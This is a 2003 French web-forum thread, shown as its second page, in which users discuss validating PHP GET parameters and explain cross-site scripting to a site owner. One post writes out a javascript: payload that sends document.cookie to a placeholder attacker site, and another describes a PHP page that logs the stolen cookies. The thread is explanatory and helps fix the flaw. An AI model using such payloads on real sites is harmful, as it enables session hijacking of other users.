Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1461 connectés 

 


 Mot :   Pseudo :  
 
 Page :   1  2
Page Suivante
Auteur Sujet :

[mysql] md5 ou password ?

n°354070
Suri
Darksurious
Posté le 06-04-2003 à 19:12:14  profilanswer
 

Reprise du message précédent :

Skylight a écrit :

echo preg_match("/(.[0-9]*?)/","28op" );
 
 
il me sort 1  :'(


pourkoi t'as un point la?
preg_match("/[0-9]+/", $str) ca suffit non? si le gars met kke chose derriere le nombre, c kil teste des truc > tu l'envoie chier et le redirige sur l'accueil...
enfin c ce que je fais moi :D


---------------
Suri.morkitu.org : Balades au coeur de la ville...
mood
Publicité
Posté le 06-04-2003 à 19:12:14  profilanswer
 

n°354072
Suri
Darksurious
Posté le 06-04-2003 à 19:13:54  profilanswer
 

Skylight a écrit :

Au risque de me repeter : ca reste du coté client ...  


il le poste ds ton forum et peux recuperer tout les cookie de tout le monde qui clique... meme toi tu peux pas faire a 100% attention a toutes les url.. (l'erreur est humaine :D) donc mieux vaut prevenir que guerir


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°354081
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 06-04-2003 à 19:22:51  profilanswer
 

Suri a écrit :


il le poste ds ton forum et peux recuperer tout les cookie de tout le monde qui clique... meme toi tu peux pas faire a 100% attention a toutes les url.. (l'erreur est humaine :D) donc mieux vaut prevenir que guerir

:jap:


---------------
lecteur mp3 yvele's smilies jeux de fille
n°354085
skylight
Made in France.
Posté le 06-04-2003 à 19:33:26  profilanswer
 

Suri a écrit :


il le poste ds ton forum et peux recuperer tout les cookie de tout le monde qui clique... meme toi tu peux pas faire a 100% attention a toutes les url.. (l'erreur est humaine :D) donc mieux vaut prevenir que guerir

je vois pa comment il peu recup les cookies de tt le monde ...

n°354088
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 06-04-2003 à 19:41:38  profilanswer
 

Skylight a écrit :

je vois pa comment il peu recup les cookies de tt le monde ...

http://www.cgisecurity.com/articles/xss-faq.shtml


---------------
lecteur mp3 yvele's smilies jeux de fille
n°354089
skylight
Made in France.
Posté le 06-04-2003 à 19:46:15  profilanswer
 

ben oui mais tu recupere TON cookie, pas ceux des autres
 
 
et pr le pavé en anglais : [:totozzz] g pas ke ca a lire là :D

n°354095
Suri
Darksurious
Posté le 06-04-2003 à 19:57:41  profilanswer
 

Skylight a écrit :

ben oui mais tu recupere TON cookie, pas ceux des autres
 
 
et pr le pavé en anglais : [:totozzz] g pas ke ca a lire là :D


 
javascript:machin.redirect("http://mechant-le-site.com/mapage.php?tescookies="+ document.cookie)
 
bref redirection js avec recuperation des cookies comme ca ( c le client qui va completer l'url)


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°354096
skylight
Made in France.
Posté le 06-04-2003 à 20:02:36  profilanswer
 

on est d'accord, mais celui ki bidouille l'url, il est seul, donc sur le mechant site yaura que ses cookies ... c pas tous les clients ki bidouille l'url


Message édité par skylight le 06-04-2003 à 20:03:06
n°354097
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 06-04-2003 à 20:04:17  profilanswer
 

Skylight a écrit :

on est d'accord, mais celui ki bidouille l'url, il est seul, donc sur le mechant site yaura que ses cookies ... c pas tous les clients ki bidouille l'url

mais vu que tu avais cette faille sur ton forum,j'aurais pu mettre le js dans l'url et des que tu clique,tu active le js qui lui envoie le cookie sur un site pirate.


---------------
lecteur mp3 yvele's smilies jeux de fille
n°354099
Suri
Darksurious
Posté le 06-04-2003 à 20:05:06  profilanswer
 

Skylight a écrit :

on est d'accord, mais celui ki bidouille l'url, il est seul, donc sur le mechant site yaura que ses cookies ... c pas tous les clients ki bidouille l'url


Evidemment il faut que ca soit la victime qui clique apres...
enfin bon...


---------------
Suri.morkitu.org : Balades au coeur de la ville...
mood
Publicité
Posté le 06-04-2003 à 20:05:06  profilanswer
 

n°354103
skylight
Made in France.
Posté le 06-04-2003 à 20:08:10  profilanswer
 

forummp3 a écrit :

mais vu que tu avais cette faille sur ton forum,j'aurais pu mettre le js dans l'url et des que tu clique,tu active le js qui lui envoie le cookie sur un site pirate.

comment tu veux que j'aille dans le site pirate si c'est moi ki clique et que ca soit toi ki mette le JS dans l'url ..

n°354104
Suri
Darksurious
Posté le 06-04-2003 à 20:09:46  profilanswer
 

Skylight a écrit :

comment tu veux que j'aille dans le site pirate si c'est moi ki clique et que ca soit toi ki mette le JS dans l'url ..


on te parle d'un lien la... plus de l'url...
t'as clique sur le lien de forummp3... ce son bien tes cookies qui sont apparu... ben la meme chose sauf qu'a la place de les afficher, ca les envoie sur un site qui les recupere justement


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°354105
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 06-04-2003 à 20:11:13  profilanswer
 

Skylight a écrit :

comment tu veux que j'aille dans le site pirate si c'est moi ki clique et que ca soit toi ki mette le JS dans l'url ..

tu fais un script js qui te redirige vers la page.php?valeur_du_cookie et avec $HTTP_SERVER_VARS['QUERY_STRING']; sur page.php tu recupere la valeur du cookie que tu stocke dans un fichier ou dans ta bdd.


---------------
lecteur mp3 yvele's smilies jeux de fille
n°354107
skylight
Made in France.
Posté le 06-04-2003 à 20:12:58  profilanswer
 

Suri a écrit :


on te parle d'un lien la... plus de l'url...
t'as clique sur le lien de forummp3... ce son bien tes cookies qui sont apparu... ben la meme chose sauf qu'a la place de les afficher, ca les envoie sur un site qui les recupere justement

hum ok g pigé :D

n°354108
Suri
Darksurious
Posté le 06-04-2003 à 20:13:40  profilanswer
 

Skylight a écrit :

hum ok g pigé :D


 
hourra!  :lol:  
 ;)


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°354109
skylight
Made in France.
Posté le 06-04-2003 à 20:15:16  profilanswer
 

Suri a écrit :


 
hourra!  :lol:  
 ;)  

j'avais pas vu lien != url [:totozz]

n°354111
skylight
Made in France.
Posté le 06-04-2003 à 20:21:46  profilanswer
 

réparé :p

n°354112
skylight
Made in France.
Posté le 06-04-2003 à 20:22:58  profilanswer
 

Suri a écrit :


pourkoi t'as un point la?
preg_match("/[0-9]+/", $str) ca suffit non? si le gars met kke chose derriere le nombre, c kil teste des truc > tu l'envoie chier et le redirige sur l'accueil...
enfin c ce que je fais moi :D


$vraicat =  !preg_match("/([^0-9]+)/",$cat);
 
 
et basta ...

n°354113
Suri
Darksurious
Posté le 06-04-2003 à 20:25:21  profilanswer
 

Skylight a écrit :


$vraicat =  !preg_match("/([^0-9]+)/",$cat);
 
 
et basta ...


bon moi pour mon forum je fais intval($_GET['cat']) et zou [:ddr555]


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°354114
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 06-04-2003 à 20:25:59  profilanswer
 

faudrait peut etre le faire avec les autres variables,non?  :whistle:  
 
http://shakalagoons.dyndns.org/sky [...] e=1&trash=


---------------
lecteur mp3 yvele's smilies jeux de fille
n°354121
skylight
Made in France.
Posté le 06-04-2003 à 20:29:15  profilanswer
 

forummp3 a écrit :

faudrait peut etre le faire avec les autres variables,non?  :whistle:  
 
http://shakalagoons.dyndns.org/sky [...] e=1&trash=

:whistle:

n°354123
skylight
Made in France.
Posté le 06-04-2003 à 20:30:08  profilanswer
 

Suri a écrit :


bon moi pour mon forum je fais intval($_GET['cat']) et zou [:ddr555]

sauf que ca marche pas avec ta methode ...

n°354124
Suri
Darksurious
Posté le 06-04-2003 à 20:31:43  profilanswer
 

Skylight a écrit :

sauf que ca marche pas avec ta methode ...

et pkoi? si le mec rentre trouducul a la place de 1 ben ca le redirigera vers la page d'erreur de cat id


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°354127
skylight
Made in France.
Posté le 06-04-2003 à 20:34:14  profilanswer
 

Suri a écrit :

et pkoi? si le mec rentre trouducul a la place de 1 ben ca le redirigera vers la page d'erreur de cat id

et si le mec rentre 12abc ?
perso ca marche pas sur moi


Message édité par skylight le 06-04-2003 à 20:34:25
n°354128
Suri
Darksurious
Posté le 06-04-2003 à 20:41:45  profilanswer
 

Skylight a écrit :

et si le mec rentre 12abc ?
perso ca marche pas sur moi


ah oui ben bien sur, si tu veux que ca remplace par 12 ok...
moi je l'envoie chier :D soit il rentre 12 soit il revient a l'accueil


---------------
Suri.morkitu.org : Balades au coeur de la ville...
mood
Publicité
Posté le   profilanswer
 

 Page :   1  2
Page Suivante

Aller à :
Ajouter une réponse
 

Sujets relatifs
[mysql]probleme d'insertion pour mysqlChangement d'hebergement : Transferts de bases MySQL
Question mysql pour un débutant... RESOLU grace a Mr yvele Merci[PHP] Transformation d'une base Excel en mySQL : c'est faisable ???
questions php/mysql :pComment faire pour ecrire dans la base mysql la date a la française ?
[PHP/MySQL] Limiter le nombre de caractères..[PHP] j'arrive pas a faire une simple requette mysql ??
problème bizarre: connexion base mysqlSe connecter a une bdd MySQL a partir d'un applet JAVA...
Plus de sujets relatifs à : [mysql] md5 ou password ?


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR